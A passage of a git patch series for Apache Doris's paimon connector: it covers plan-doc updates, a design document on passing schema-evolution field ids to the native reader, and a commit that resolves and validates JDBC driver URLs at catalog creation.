fix 显式不收**,归 task-list #2 `FIX-STATIC-CREDS-BE` / `FIX-REST-VENDED`(review §9.3 三道凭据缝之一)。fail-loud 优于静默送裸 `oss://`(后者 DV 错行)| [task-list #1](./task-list-P5-rereview2-fixes.md) / [P5-fix-URI-NORMALIZE 设计](./tasks/designs/P5-fix-URI-NORMALIZE-design.md) / [SPI RFC §21](./01-spi-extensions-rfc.md) | 2026-06-11 | 🟢 已登记(scope 决策,凭据边角归 #2/#3)| | DV-024 | P5-B4 揭出并修复 B2 遗留缺陷(普通 paimon plugin 表 BE 描述符错型):`PaimonConnectorMetadata` 不 override `buildTableDescriptor`(SPI default 返 null)→ `PluginDrivenExternalTable.toThrift` 走 fallback `SCHEMA_TABLE`(BE `descriptors.cpp:635` 建 `SchemaTableDescriptor`),而 legacy `PaimonExternalTable.toThrift` + sys 表须 `HIVE_TABLE`(`:644` `HiveTableDescriptor`)。B4/T19 加 `buildTableDescriptor` override(`HIVE_TABLE`+`THiveTable`,镜像 legacy + MC `MaxComputeConnectorMetadata.buildTableDescriptor`),**一处修同时正普通表+sys 表**。inert until 翻闸(paimon 未入 `SPI_READY_TYPES`),真值闸=live-e2e BE 描述符 | [tasks/P5 T19](./tasks/P5-paimon-migration.md) / [D-039](./decisions-log.md) | 2026-06-10 | 🟢 已修正(T19,live-e2e 待验)| | DV-023 | RFC §10(E7 Sys Tables)设计被 P5-B4 取代:RFC §10 的「sys-table = `$`-后缀普通表 + 连接器 `getTableHandle` 内解析后缀 + `listSysTableSuffixes`」**从未实现**;live fe-core 实为 `SysTableResolver`+`NativeSysTable`+`TableIf.getSupportedSysTables/findSysTable`(iceberg + legacy-paimon 共用)。B4 按 [D-039](./decisions-log.md) 复用该 live 机制(连接器 `listSupportedSysTables`+`getSysTableHandle`,fe-core 通用 `PluginDrivenSysExternalTable`),RFC §10 加脚注标 superseded | [01-spi-extensions-rfc.md §10](./01-spi-extensions-rfc.md) / [D-039](./decisions-log.md) | 2026-06-10 | 🟢 已修正(RFC §10 脚注 + D-039)| diff --git a/plan-doc/task-list-P5-rereview2-fixes.md b/plan-doc/task-list-P5-rereview2-fixes.md index 85fadaade964ec..f69ba8e8353559 100644 --- a/plan-doc/task-list-P5-rereview2-fixes.md +++ b/plan-doc/task-list-P5-rereview2-fixes.md @@ -25,7 +25,7 @@ |---|----|-----|---------|----------------|------|--------|------|----------|--------| | 1 | FIX-URI-NORMALIZE | BLOCKER | B-7DV + B-7DF | native data-file + DV path scheme norm (oss/cos/obs/s3a→s3) | **yes** | ✅ | ✅ | ✅ | ✅ `20b19d19dd8` | | 2 | FIX-STATIC-CREDS-BE | BLOCKER | B-9 | static s3/oss/cos/obs creds → BE as canonical `AWS_*` | **yes** | ✅ | ✅ | ✅ | ✅ `d23d5df9914` | -| 3 | FIX-SCHEMA-EVOLUTION | BLOCKER | B-1a (+M-10) | emit `current_schema_id`/`history_schema_info` + field-id thru SPI | **yes** | ⬜ | ⬜ | ⬜ | ⬜ | +| 3 | FIX-SCHEMA-EVOLUTION | BLOCKER | B-1a (M-10 deferred) | connector builds `current_schema_id`/`history_schema_info` thrift dict (Design C) | no¹ | ✅ | ✅ | ✅ 222/0/0 | ⬜ pending | | 4 | FIX-JDBC-DRIVER-URL | BLOCKER | B-8a + B-8b | resolve+alias `jdbc.driver_url` for BE; enforce security allow-list | maybe | ⬜ | ⬜ | ⬜ | ⬜ | | 5 | FIX-MAPPING-FLAG-KEYS | MAJOR | M-crit | dotted-vs-underscore type-mapping flag keys (wrong type) | no | ⬜ | ⬜ | ⬜ | ⬜ | | 6 | FIX-KERBEROS-DOAS | MAJOR | M-8 + M-11 | UGI `doAs` on fs/jdbc ops + partition-listing read path | maybe | ⬜ | ⬜ | ⬜ | ⬜ | @@ -34,6 +34,7 @@ | 9 | FIX-NATIVE-SUBSPLIT | MAJOR* | M-3 | native ORC/Parquet sub-file splitting (parallelism) | maybe | ⬜ | ⬜ | ⬜ | ⬜ | `sev*` = round-2 rated MAJOR but round-1 rated **MINOR** (perf-only, correct results) — **user decides severity** (see §P2). +¹ #3 SPI corrected `yes`→**`no`**: user signed **Design C** ([D-049](./decisions-log.md)) — the connector builds the thrift `TSchema` dict directly from paimon (BE only needs field `id`/`name`/nesting-tag, no Doris `Type`), reusing the existing `populateScanLevelParams` hook → **zero new SPI surface**. M-10 deferred ([DV-026](./deviations-log.md)); eager all-schemas read accepted ([DV-027](./deviations-log.md)). Legend: ⬜ todo / 🔄 in progress / ✅ done > **Ordering rationale**: P0 (#1–4) all gate commit. #1+#2 first = broadest blast radius (they break *all* native reads on OSS/COS/OBS/private-S3 — basic cloud usage) and share the same BE-bound scan-property-normalization seam (reuse the `FIX-REST-VENDED` `ConnectorContext` pattern). #3 (B2) is the most *dangerous* failure mode (silent wrong rows) but has a narrower trigger (schema-evolved + native + rename) and a larger SPI surface; **if you weight silent-corruption highest, do #3 first — it is independent of #1/#2.** #4 (JDBC) is isolated to one flavor. diff --git a/plan-doc/tasks/designs/P5-fix-SCHEMA-EVOLUTION-design.md b/plan-doc/tasks/designs/P5-fix-SCHEMA-EVOLUTION-design.md new file mode 100644 index 00000000000000..3dbb0213f922da --- /dev/null +++ b/plan-doc/tasks/designs/P5-fix-SCHEMA-EVOLUTION-design.md @@ -0,0 +1,212 @@ +# P5-fix-SCHEMA-EVOLUTION — native reader loses paimon schema-evolution (B-1a, +M-10 deferred) + +> Task #3 of `task-list-P5-rereview2-fixes.md`. Finding: rereview2 §3 **B-1a** (BLOCKER) + **M-10** (MAJOR). +> Design chosen by user: **Design C — connector builds the thrift `TSchema` list directly** (zero new SPI surface). M-10 deferred (see §Deferred). + +--- + +## Problem + +On the **native** (ORC/Parquet) read path the connector emits only a per-file `schema_id` +(`TPaimonFileDesc.schema_id`) but never sets the scan-level `TFileScanRangeParams.current_schema_id` +or `history_schema_info`. BE (`be/src/format/table/table_schema_change_helper.h:219-237`) then takes +the `!__isset.history_schema_info` branch → **name-based** file↔table column matching. On a +schema-evolved table (column rename / reorder) the older-schema data files have different column +names, so renamed columns read **NULL / garbage silently**. JNI path is unaffected (the serialized +paimon `Table` carries its own schema); native is the default for ORC/Parquet, so the common case is broken. + +E2E repro: `regression-test/.../test_paimon_full_schema_change.groovy` (struct field `a`→`new_a` over +ORC/Parquet) — `SELECT new_a` returns NULL for pre-rename rows. + +## Root Cause + +The cutover connector reproduced the per-file `schema_id` tag but **not** the two scan-level fields the +BE field-id matcher requires. Legacy `paimon/source/PaimonScanNode` set them via +`ExternalUtil.initSchemaInfo(params, -1L, currentColumns)` (current entry) + +`putHistorySchemaInfo(file.schemaId())` (per native split) → `PaimonUtil.getHistorySchemaInfo` (one +`TSchema` per referenced schema id, built from the historical paimon `TableSchema`). The generic +`PluginDrivenScanNode` bridge never calls any `ExternalUtil.initSchemaInfo*` (grep-confirmed: only +Iceberg/Hudi/legacy-Paimon scan nodes do), and the connector has no seam emitting these fields. + +## Frozen BE contract (re-confirmed against current code) + +`be/src/format/table/table_schema_change_helper.{h,cpp}` + `gensrc/thrift/{PlanNodes,ExternalTableSchema}.thrift`: + +- `TFileScanRangeParams.current_schema_id` (i64, field 25) + `history_schema_info` + (`list`, field 26). `TSchema{schema_id, root_field:TStructField}`; + `TField{is_optional, i32 id, name, TColumnType type, TNestedField nestedField, name_mapping}`. +- Native matcher `gen_table_info_node_by_field_id(params, split_schema_id)`: + - if `current_schema_id == split_schema_id` → `ConstNode` (identity, name-based) **fast path**. + - else linear-scan `history_schema_info` for the entries whose `.schema_id ==` current and split; + **`InternalError("miss table/file schema info")` if either is absent** (fail-loud, not silent). + - else `by_table_field_id(history[current].root_field, history[split].root_field)` — matches table + field → file field **by `TField.id`**, names may differ (rename-safe); a table id absent from the + file → `add_not_exist_children` (read NULL). +- **What BE actually reads from each `TField`** (`table_schema_change_helper.cpp:312-430`): `id`, + `name`, and `type.type` used **only as a nesting tag** (`== MAP / ARRAY / STRUCT`, else scalar). + It never reads precision/scale and **never reads the tuple/slot descriptor** in the field-id path. + +Two consequences that drive the design: +1. A correct `TSchema` needs only paimon field `id` + `name` + a primitive **tag** — **no Doris `Type` + / `toColumnTypeThrift` required**. So the connector can build it (and `org.apache.doris.thrift.*` + — incl. `…thrift.schema.external.*` — is **import-legal** in connectors; the gate only bans + `catalog|common|datasource|qe|analysis|nereids|planner`). +2. `Column.uniqueId` (M-10) is **not** read by BE; it only mattered in legacy as the *source* the + FE history-builder read. Building the history map straight from paimon `DataField.id()` makes + B-1a independent of M-10 → M-10 deferred. + +## Design (Design C — connector-side, no new SPI) + +Build the scan-level schema dictionary entirely inside the connector, from the live (snapshot-pinned) +paimon `Table`'s `SchemaManager`, and set it on `params` via the **existing** `populateScanLevelParams` +SPI hook. The per-split `schema_id` tag is **already** emitted (`PaimonScanRange` → +`fileDesc.setSchemaId`) — no change there. + +### What to emit (parity with legacy semantics) + +- `params.current_schema_id = -1L` — keep the legacy `-1` sentinel ("latest"), for exact parity + (legacy always routed through `by_table_field_id`, never the ConstNode fast path). +- `history_schema_info` = + - one entry keyed **`-1`** built from the table's **latest** `TableSchema` + (`schemaManager().latest()`), i.e. the "current/target" schema, **plus** + - one entry per id in `schemaManager().listAllIds()`, each built from `schemaManager().schema(id)`. + + Using `listAllIds()` (all committed schemas) instead of only the split-referenced ids (which the + connector cannot know at this seam without planning) **guarantees** every native file's + `schema_id` is covered → never the BE `InternalError`. Extra entries are harmless (BE only looks up + `current_schema_id` and each split's id). Perf delta vs legacy logged as a deviation (§Risk). + +### How to build each `TSchema` (direct port of `PaimonUtil.getSchemaInfo`) + +New package-private static helpers in the connector (mirroring `PaimonUtil.getSchemaInfo(349-430)` +but emitting a primitive **tag** instead of `toColumnTypeThrift`), so they are unit-testable from +plain paimon `DataField`s without a live `DataTable`: + +``` +TSchema buildSchemaInfo(TableSchema s): + TSchema{ schemaId = s.id(); rootField = buildStructField(s.fields()) } + +TStructField buildStructField(List fields): // sets id+name (the match keys) + for f in fields: + TField c = buildField(f.type()); c.setName(f.name()); c.setId(f.id()); // id only on top-level + struct fields + add c + +TField buildField(DataType t): // nesting structure + tag + ARRAY → nested.array_field.item_field = buildField(elem); type.type = ARRAY + MAP → nested.map_field.key/value = buildField(k/v); type.type = MAP + ROW → nested.struct_field = buildStructField(t.getFields()); type.type = STRUCT + else → type.type = tag(t) // scalar: BE ignores the exact tag + set is_optional = t.isNullable() +``` + +`tag(DataType)`: a compact `paimon DataTypeRoot → TPrimitiveType` switch (mirrors +`PaimonTypeMapping.toConnectorType`'s choices; **only ARRAY/MAP/STRUCT are load-bearing**, scalars are +cosmetic — default `STRING`). Field-id is set **only** on top-level columns and STRUCT fields +(array element / map key+value / leaf scalars are matched structurally by BE, never by id — +exactly as legacy `getSchemaInfo` does). + +### Where it runs + transport (provider is per-call → state via props) + +`getScanPlanProvider()` returns a **new** `PaimonScanPlanProvider` per call, so +`getScanNodeProperties` and `populateScanLevelParams` run on **different instances**; the only shared +channel is the props map (bridge caches `getScanNodeProperties` output and feeds it to +`populateScanLevelParams`). Therefore: + +1. **`getScanNodeProperties`** (already resolves the live scan `Table`): if the table is a native- + eligible normal data table (`table instanceof org.apache.paimon.table.DataTable`), build the + `current_schema_id` + `List` from its `schemaManager()`, stage them onto a throwaway + `TFileScanRangeParams`, `TSerializer`-serialize → base64 → `props.put("paimon.schema_evolution", …)`. + Guard: non-`DataTable` (sys-tables `audit_log`/`binlog`, which go JNI and never consult + `history_schema_info`) or any `SchemaManager` failure → skip the prop (no regression; native + non-evolved tables still read correctly via BE name-matching). +2. **`populateScanLevelParams`**: if `props["paimon.schema_evolution"]` present, `TDeserializer` it and + copy `currentSchemaId` + `historySchemaInfo` onto the real `params`. + +`TSerializer`/`TDeserializer` (`org.apache.thrift.*`, already a transitive runtime dep of the thrift +classes the connector uses) keep the transport classloader-safe; the schema is built from the **live** +table (no paimon `Table` round-trip). + +## Implementation Plan + +Connector only (`fe-connector-paimon`); **no fe-core / SPI / BE / thrift-IDL changes**. + +1. `PaimonScanPlanProvider.java` + - Imports: `org.apache.doris.thrift.schema.external.{TSchema,TField,TStructField,TArrayField,TMapField,TNestedField,TFieldPtr}`, `org.apache.doris.thrift.{TColumnType,TPrimitiveType}`, `org.apache.thrift.{TSerializer,TDeserializer}`, paimon `schema.{SchemaManager,TableSchema}` + `table.DataTable` + `types.*`. + - New static helpers `buildSchemaInfo` / `buildStructField` / `buildField` / `tag` (above). + - New helper `buildSchemaEvolutionParams(Table) → Optional` (base64) guarded on `DataTable`. + - `getScanNodeProperties`: after resolving `table`, `buildSchemaEvolutionParams(table)` → put `paimon.schema_evolution` prop (skip when empty). + - `populateScanLevelParams`: read `paimon.schema_evolution` → deserialize → set `current_schema_id` + `history_schema_info` on `params`. +2. No change to `buildNativeRange` / `PaimonScanRange` (per-file `schema_id` already emitted). + +## Risk Analysis + +- **Fail-loud on coverage gap**: history covers `-1` (latest) + all `listAllIds()` ⊇ every committed + file `schema_id`, so the BE `InternalError("miss table/file schema info")` cannot trigger from a + missing entry. (A file referencing a *deleted* schema is already unreadable — pre-existing, fail-loud.) +- **Perf (accepted deviation, logged)**: legacy fetched only split-referenced schemas via a cached + loader; Design C reads `listAllIds()` + each `schema(id)` from the live table per scan (no fe-core + cache reachable from the connector). Bounded (K small JSON reads, K = #schema versions; once per + scan, props cached). Correctness-first; future optimization = referenced-only (needs a split-aware + seam) or a connector-side cache. → `deviations-log.md`. +- **Scalar `type.type` tag is best-effort**: safe because BE consumes only the ARRAY/MAP/STRUCT-vs- + scalar distinction in the field-id path (verified). Nested tags are exact. +- **Snapshot/time-travel**: matches legacy (current = latest schema; D-043 schema-at-snapshot is a + separate, untouched path). E2E is rename, not time-travel. +- **JNI / sys-tables**: `history_schema_info` set on a JNI-only scan is never read by BE → harmless; + `DataTable` guard additionally avoids building it for sys-tables. + +## Test Plan + +### Unit (runnable FE, `PaimonScanPlanProviderTest`) +- `buildSchemaInfo`/`buildField` over constructed paimon `DataField`s (no `DataTable` needed): + - flat schema → `TSchema.root_field.fields[i].{id,name}` == paimon field id/name; `type.type` tag correct. + - nested ARRAY, MAP, ROW → correct `TNestedField` shape; STRUCT children carry their paimon ids; array element / map kv carry no id (match legacy). + - rename case: two `TableSchema`s (id 0 `a:int`, id 1 `new_a:int` same field id) → both entries present; ids stable across rename. +- `populateScanLevelParams` round-trip: a staged `paimon.schema_evolution` prop → asserts + `params.isSetCurrentSchemaId()` (== -1) and `params.getHistorySchemaInfo()` matches the built list. +- Guard: non-`DataTable` (e.g. `FakePaimonTable`) → no `paimon.schema_evolution` prop, existing + prop-map assertions unchanged (update any test that snapshots the exact prop set). + +### E2E (CI-gated — note as gated, not run locally) +- `test_paimon_full_schema_change.groovy` (rename over ORC/Parquet): pre-rename rows read the correct + values under `SELECT new_a` (was NULL). + +## Deferred — M-10 (`Column.uniqueId == -1`) + +The connector still builds `ConnectorColumn` without a field-id channel, so Doris `Column.uniqueId` +stays `-1`. Per the user's Design-C choice this is **deferred**: rereview2 §4 refuted the standalone +M-10 repro (no demonstrated user-visible consumer; BE does not read the tuple descriptor in the +field-id path, and the only legacy `Column.uniqueId` consumer — `ExternalUtil.initSchemaInfo` via the +legacy scan node — is dead post-cutover). B-1a is fully fixed independently. Logged in +`deviations-log.md` (re-confirm inconsequential if a future field-id consumer appears, e.g. an +SPI-on iceberg/hudi reusing `ExternalUtil` from Doris columns). + +## Review Outcome (clean-room, 3-lens + verify) + +A 3-lens adversarial review (legacy-parity / BE-contract / edge-regression, each finding +adversarially verified) **confirmed the non-time-travel core mechanism correct** but found **2 real +BLOCKERs in the `-1`/current entry**, both fixed (re-verified `fix_complete && !new_defect`): + +1. **Column-name casing.** I built the `-1` entry with paimon's case-preserving `field.name()`. BE + keys the table-side `StructNode` by that name **verbatim** (`table_schema_change_helper.cpp:404,414`), + while the native reader looks it up by the **lowercase Doris slot name** + (`vorc_reader.cpp:500-501`); and because `current_schema_id=-1` never equals a real file + `schema_id`, the `ConstNode` fast-path is **never** taken — so `by_table_field_id` runs on **every** + native read. A mixed/upper-case column → `children.at("mycol")` miss → `std::out_of_range`/crash, + **regressing even never-evolved tables**. **Fix:** lowercase **only top-level** names of the `-1` + entry (default-locale `toLowerCase()`, byte-matching the slot-name producer + `PaimonConnectorMetadata` + legacy `parseSchema:507`); nested struct names stay paimon-cased + (legacy is asymmetric — `PaimonUtil:302` keeps nested case), historical entries fully paimon-cased. + +2. **Time travel.** I built the `-1` entry from `schemaManager().latest()` (absolute latest), but a + time-travel read's tuple slots use the **snapshot-pinned** schema → BE keys by latest names, the + reader queries pinned names → crash/wrong-rows on a column renamed between the pinned snapshot and + latest. **Fix:** build the `-1` entry from `((FileStoreTable) table).schema()` — the resolved + (snapshot-pinned) schema, the same one the tuple uses (verified: `copyInternal`/`tryTimeTravel` + sets `tableSchema` to `schema(snapshot.schemaId())`). For non-time-travel reads `schema() == latest` + → no change. Guard narrowed `DataTable`→`FileStoreTable` (gives both `schema()` and + `schemaManager()`; every native-eligible table is a `FileStoreTable`). + +The MINOR (eager `listAllIds()` reads all committed schemas, uncached → a transient IO error on an +*unreferenced* schema aborts a scan legacy would complete) is the design's accepted fail-loud +deviation — logged in `deviations-log.md` (DV-027), not a commit blocker. From 0579464983d9ac13fa5fb3cd1d5d9ca49d8eed4c Mon Sep 17 00:00:00 2001 From: morningman Date: Thu, 11 Jun 2026 20:10:13 +0800 Subject: [PATCH 020/128] =?UTF-8?q?fix:=20FIX-JDBC-DRIVER-URL=20=E2=80=94?= =?UTF-8?q?=20resolve+alias=20driver=5Furl=20for=20BE;=20validate=20at=20C?= =?UTF-8?q?REATE=20(B-8a=20+=20B-8b)?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit rereview2 #4. JDBC-metastore-flavor paimon catalogs only. Connector-only, zero new SPI. Root cause: - B-8a (functional BLOCKER): PaimonScanPlanProvider.getBackendPaimonOptions forwarded driver_url to BE RAW and its `key.startsWith("jdbc.")` filter dropped the `paimon.jdbc.*` alias. A bare `jdbc.driver_url=mysql.jar` reached BE, where JdbcDriverUtils.registerDriver does `new URL(value)` -> MalformedURLException; a `paimon.jdbc.driver_url` alias was dropped outright. Legacy PaimonJdbcMetaStoreProperties.getBackendPaimonOptions emits `jdbc.driver_url=JdbcResource.getFullDriverUrl(driverUrl)` (resolved) + `jdbc.driver_class`. - B-8b (security): driver_url was loaded into the FE JVM (URLClassLoader) and shipped to BE with no format / jdbc_driver_url_white_list / jdbc_driver_secure_path validation, plus a stale "paimon is not in SPI_READY_TYPES" disclaimer (false since the B7 cutover added paimon to CatalogFactory SPI_READY_TYPES). Solution (reuses existing hooks; no new SPI surface): - B-8a: getBackendPaimonOptions now reads driver_url via firstNonBlank(JDBC_DRIVER_URL) (honors both the jdbc.* and paimon.jdbc.* alias) and emits the canonical `jdbc.driver_url` RESOLVED to a scheme-bearing URL plus `jdbc.driver_class` (BE accepts both alias forms). Resolution is extracted to a shared static PaimonCatalogFactory.resolveDriverUrl(driverUrl, env) so FE driver registration and the BE-bound options resolve a given driver_url identically. - B-8b: PaimonConnector overrides Connector.preCreateValidation to route a configured driver_url (either alias) through ConnectorValidationContext.validateAndResolveDriverPath at CREATE CATALOG (format/whitelist/secure-path; throws -> CREATE fails before the jar loads). Mirrors JdbcDorisConnector. Stale disclaimer replaced with an accurate note. Scope (user-signed D-050; see DV-028/DV-029): validation is CREATE-time only — parity with the JDBC reference connector. The FE-restart-reload / ALTER-CATALOG / scan-time re-validation gap is a pre-existing fe-core limitation shared by all plugin connectors (default config is permissive); accepted, with a cross-connector follow-up filed. BE-side paimon.jdbc.{user,password,uri} alias-drop is out of scope (BE deserializes the table from serialized_table; only driver_url/driver_class are consumed by registerDriverIfNeeded). Tests: PaimonScanPlanProviderTest +5 (resolve bare name, honor paimon.jdbc.* alias, both-aliases priority+override, preserve scheme-bearing, non-jdbc empty); new PaimonConnectorPreCreateValidationTest +5 (validate jdbc/alias, skip non-jdbc/no-driver_url, propagate rejection). Module 232/0/0 (1 CI-gated skip); fail-before verified (5/9 new tests red when neutered); checkstyle 0; connector import-gate clean. Live e2e (JDBC flavor + remote jar) is CI-gated. Co-Authored-By: Claude Opus 4.8 (1M context) --- .../paimon/PaimonCatalogFactory.java | 35 ++++ .../connector/paimon/PaimonConnector.java | 62 +++--- .../paimon/PaimonScanPlanProvider.java | 21 +- ...aimonConnectorPreCreateValidationTest.java | 153 ++++++++++++++ .../paimon/PaimonScanPlanProviderTest.java | 115 ++++++++++ plan-doc/01-spi-extensions-rfc.md | 10 + plan-doc/decisions-log.md | 1 + plan-doc/deviations-log.md | 4 +- plan-doc/task-list-P5-rereview2-fixes.md | 5 +- .../designs/P5-fix-JDBC-DRIVER-URL-design.md | 198 ++++++++++++++++++ 10 files changed, 575 insertions(+), 29 deletions(-) create mode 100644 fe/fe-connector/fe-connector-paimon/src/test/java/org/apache/doris/connector/paimon/PaimonConnectorPreCreateValidationTest.java create mode 100644 plan-doc/tasks/designs/P5-fix-JDBC-DRIVER-URL-design.md diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java index 86c303ce23cbf2..e964b688033ed4 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonCatalogFactory.java @@ -136,6 +136,41 @@ public static String firstNonBlank(Map props, String... keys) { return null; } + /** + * Resolves a JDBC {@code driver_url} to a full, scheme-bearing URL string. A value already + * carrying a scheme ({@code "://"}) is used as-is; an absolute path (starting with {@code "/"}) + * is returned unchanged; otherwise it is treated as a bare jar file name and resolved against + * the engine's configured {@code jdbc_drivers_dir} (defaulting to + * {@code $DORIS_HOME/plugins/jdbc_drivers}), mirroring the minimal {@code JdbcResource.getFullDriverUrl} + * resolution (no file-existence / legacy old-dir / cloud-download handling). + * + *

      Shared by {@code PaimonConnector} (FE {@code URLClassLoader} driver registration) and + * {@code PaimonScanPlanProvider.getBackendPaimonOptions} (the BE-bound options, where BE does + * {@code new URL(value)} and a bare {@code "mysql.jar"} would throw {@code MalformedURLException}) + * so BOTH sides resolve a given {@code driver_url} identically. Security validation + * (format / {@code jdbc_driver_url_white_list} / {@code jdbc_driver_secure_path}) is enforced + * separately at CREATE CATALOG via {@code PaimonConnector.preCreateValidation}. + * + * @param driverUrl the raw driver_url; must be non-null and non-blank (the caller's responsibility — + * both call sites guard with {@code firstNonBlank}/non-null checks before calling) + * @param env the engine environment map (e.g. {@code jdbc_drivers_dir}, {@code doris_home}); never null + */ + public static String resolveDriverUrl(String driverUrl, Map env) { + if (driverUrl.contains("://")) { + return driverUrl; + } + if (driverUrl.startsWith("/")) { + // Absolute path, no scheme: legacy returns it as-is (no driversDir prepend). + return driverUrl; + } + String driversDir = env.get("jdbc_drivers_dir"); + if (StringUtils.isBlank(driversDir)) { + String dorisHome = env.getOrDefault("doris_home", "."); + driversDir = dorisHome + "/plugins/jdbc_drivers"; + } + return "file://" + driversDir + "/" + driverUrl; + } + /** * Fail-fast validation, mirroring the legacy per-flavor rules. Throws * {@link IllegalArgumentException} (style consistent with MaxCompute), which the caller diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java index 7a7148db29698d..d239c83c4b84cb 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonConnector.java @@ -21,6 +21,7 @@ import org.apache.doris.connector.api.ConnectorCapability; import org.apache.doris.connector.api.ConnectorMetadata; import org.apache.doris.connector.api.ConnectorSession; +import org.apache.doris.connector.api.ConnectorValidationContext; import org.apache.doris.connector.api.scan.ConnectorScanPlanProvider; import org.apache.doris.connector.spi.ConnectorContext; @@ -38,6 +39,7 @@ import java.net.MalformedURLException; import java.net.URL; import java.net.URLClassLoader; +import java.util.Collections; import java.util.EnumSet; import java.util.Map; import java.util.Set; @@ -195,6 +197,28 @@ private Catalog createCatalogFromContext(CatalogContext catalogContext, String f } } + /** + * Enforces JDBC driver-url security at CREATE CATALOG (rereview2 B-8b). For the JDBC flavor a + * configured {@code driver_url} — read from either the {@code jdbc.driver_url} or the + * {@code paimon.jdbc.driver_url} alias — is routed through the engine's + * {@link ConnectorValidationContext#validateAndResolveDriverPath} hook, which applies the FE + * format / {@code jdbc_driver_url_white_list} / {@code jdbc_driver_secure_path} gates (legacy + * {@code JdbcResource.getFullDriverUrl}). A rejected url throws here, so CREATE CATALOG fails + * before the jar is ever loaded into the FE JVM by {@link #maybeRegisterJdbcDriver}. Mirrors + * {@code JdbcDorisConnector.preCreateValidation}; non-JDBC flavors are a no-op. + */ + @Override + public void preCreateValidation(ConnectorValidationContext validationContext) throws Exception { + if (!PaimonConnectorProperties.JDBC.equals(PaimonCatalogFactory.resolveFlavor(properties))) { + return; + } + String driverUrl = PaimonCatalogFactory.firstNonBlank( + properties, PaimonConnectorProperties.JDBC_DRIVER_URL); + if (StringUtils.isNotBlank(driverUrl)) { + validationContext.validateAndResolveDriverPath(driverUrl); + } + } + /** * If a JDBC driver_url is configured, dynamically load + register the driver before creating * the catalog. {@link java.sql.DriverManager#getConnection} does not consult the thread context @@ -216,34 +240,22 @@ private void maybeRegisterJdbcDriver() { } /** - * Resolves a driver_url to a full URL string. If it is already a URL (contains {@code "://"}) - * it is used as-is; an absolute path (starting with {@code "/"}) is returned unchanged; - * otherwise it is treated as a bare jar file name and resolved against the engine's configured - * {@code jdbc_drivers_dir} (defaulting to {@code $DORIS_HOME/plugins/jdbc_drivers}), mirroring - * the minimal {@code JdbcResource.getFullDriverUrl} behavior. + * Resolves a driver_url to a full, scheme-bearing URL string for FE driver registration, + * delegating to the shared {@link PaimonCatalogFactory#resolveDriverUrl} so the FE registration + * path and the BE-bound scan options ({@code PaimonScanPlanProvider.getBackendPaimonOptions}) + * resolve a given driver_url identically. * - *

      NOTE (B1/cutover-blocker): legacy JdbcResource.getFullDriverUrl enforced FE security - * allow-lists (jdbc_driver_url_white_list, jdbc_driver_secure_path) + jar-name format - * validation. Those gates are NOT enforced here (the connector cannot import fe-core). - * Before the jdbc driver_url path goes live at cutover (P5-B7), driver-url validation - * must be routed through a ConnectorContext hook (cf. sanitizeJdbcUrl). Until then, - * paimon is not in SPI_READY_TYPES so this path is not user-reachable. + *

      FE security validation (format / {@code jdbc_driver_url_white_list} / + * {@code jdbc_driver_secure_path}) is enforced at CREATE CATALOG by {@link #preCreateValidation} + * via the engine's {@code ConnectorValidationContext.validateAndResolveDriverPath} hook — a + * rejected url fails catalog creation before this path is ever reached. Like the JDBC reference + * connector ({@code JdbcDorisConnector}), validation is CREATE-time only; catalogs reloaded after + * an FE restart or reconfigured via ALTER CATALOG are not re-validated against a since-tightened + * allow-list (a pre-existing fe-core gap shared by all plugin connectors — see deviations-log). */ private String resolveFullDriverUrl(String driverUrl) { - if (driverUrl.contains("://")) { - return driverUrl; - } - if (driverUrl.startsWith("/")) { - // Absolute path, no scheme: legacy returns it as-is (no driversDir prepend). - return driverUrl; - } - Map env = context.getEnvironment(); - String driversDir = env.get("jdbc_drivers_dir"); - if (StringUtils.isBlank(driversDir)) { - String dorisHome = env.getOrDefault("doris_home", "."); - driversDir = dorisHome + "/plugins/jdbc_drivers"; - } - return "file://" + driversDir + "/" + driverUrl; + Map env = context != null ? context.getEnvironment() : Collections.emptyMap(); + return PaimonCatalogFactory.resolveDriverUrl(driverUrl, env); } private void registerJdbcDriver(String driverUrl, String driverClassName) { diff --git a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java index 810def2a6b02e4..8fb5cae590c6b8 100644 --- a/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java +++ b/fe/fe-connector/fe-connector-paimon/src/main/java/org/apache/doris/connector/paimon/PaimonScanPlanProvider.java @@ -608,7 +608,8 @@ private String getTableLocation(Table table) { return table.options().get("path"); } - private Map getBackendPaimonOptions() { + // Package-private for direct unit testing (PaimonScanPlanProviderTest). + Map getBackendPaimonOptions() { String metastoreType = properties.get("paimon.catalog.type"); if (!"jdbc".equalsIgnoreCase(metastoreType)) { return Collections.emptyMap(); @@ -623,6 +624,24 @@ private Map getBackendPaimonOptions() { options.put(key, entry.getValue()); } } + // FIX-JDBC-DRIVER-URL (B-8a): the loop above forwards driver_url RAW and only matches the + // "jdbc.*" form, so a bare "jdbc.driver_url=mysql.jar" reaches BE unresolved (BE does + // new URL(value) -> MalformedURLException, JdbcDriverUtils.registerDriver) and a + // "paimon.jdbc.driver_url" alias is dropped entirely. Emit the canonical, RESOLVED keys the + // BE reader accepts (PaimonJdbcDriverUtils reads both aliases): honor either alias and resolve + // a bare jar name to a full file:// URL. Mirrors legacy + // PaimonJdbcMetaStoreProperties.getBackendPaimonOptions (getFullDriverUrl + driver_class). + String driverUrl = PaimonCatalogFactory.firstNonBlank( + properties, PaimonConnectorProperties.JDBC_DRIVER_URL); + if (driverUrl != null) { + Map env = context != null ? context.getEnvironment() : Collections.emptyMap(); + options.put("jdbc.driver_url", 